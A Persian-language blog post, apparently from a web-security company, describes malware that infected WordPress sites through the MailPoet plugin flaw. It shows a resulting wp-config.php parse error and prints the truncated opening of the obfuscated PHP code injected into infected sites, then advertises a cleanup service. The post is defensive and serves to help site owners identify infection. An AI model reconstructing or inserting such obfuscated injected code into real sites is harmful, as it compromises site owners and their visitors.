آسیبپذیری MailPoet در وردپرس و نحوه شناسایی آن
آسیبپذیری MailPoet در وردپرس و نحوه شناسایی آن، چندی پیش، یک تروجان یا همان Malware وارد برخی از وب سایت های وردپرس شده و خساراتی زیادی هم به کاربران آن داشته. این malware، همراه با مشکلی که در افزونه MailPoet وجود دارد، فعال می شود. این تروجان به خاطر وارد شدن به صورت مخفی به هاست وردپرس، موجب ویرانی های و از دسترس خارج شدن وب سایت های پربازدید میشود که این مورد می تواند بر روی لود و عملکرد سرور مجازی سایت نیز تاثیر گذار باشد . مقصود این تروجان از حملات، آسیب زدن به سایت های پربازدید و محبوب وردپرسی است.
سایت های مورد حمله :
وب سایت هایی که تا به الان مورد سوء استفاده این حمله واقع شده اند، از ورژن های قدیمی وردپرس استفاده می کردند و یا با مشکل ضعیف بودن رمز مدیر سایت روبرو بوده اند.
تا امروز نحوه کار این Malware، همچنان نامشخص بوده ولی یکی از روش های آن، فرستادن اسپم برای هک کردن سایت است. این تروجان فقط به وردپرس حمله نمیکند، حتی قالب و افزونه های آن را هم مورد خطر قرار میدهد که می تواند باعث تاثیر منفی بر روی سرور مجازی شود . معمولا سایت هایی که با مشکل روبرو بوده اند، با پیام های خطای متنوعی برخورد داشته که مثل خطای زیر است :
[su_code]Parse error: syntax error, unexpected ‘)’ in /home/user/public_html/site/wp-config.php on line 91[/su_code]
برای شناختن این تروجان و جلوگیری از میزان تخریب آن بهترین راه برگرداندن یک بکاپ سالم از سایت است! این Malware هر دفعه با یک دستور رندوم نصب دستور زیر، وارد وردپرس میشود و باعث ایجاد اختلال می شود :
[su_code]<!– ?php $pblquldqei = ’5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%xq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7–>q7825)3of:opjudovg<~%x5c%x7824!%x5c%x782421787825!|!*!***b%x5c%x7825)… [/su_code]
در صورتی که بابت آلودگی سایت خود مشکوک هستید تیم امنیت وب پویان در زمینه بررسی و پاکسازی شما را یاری می نماید .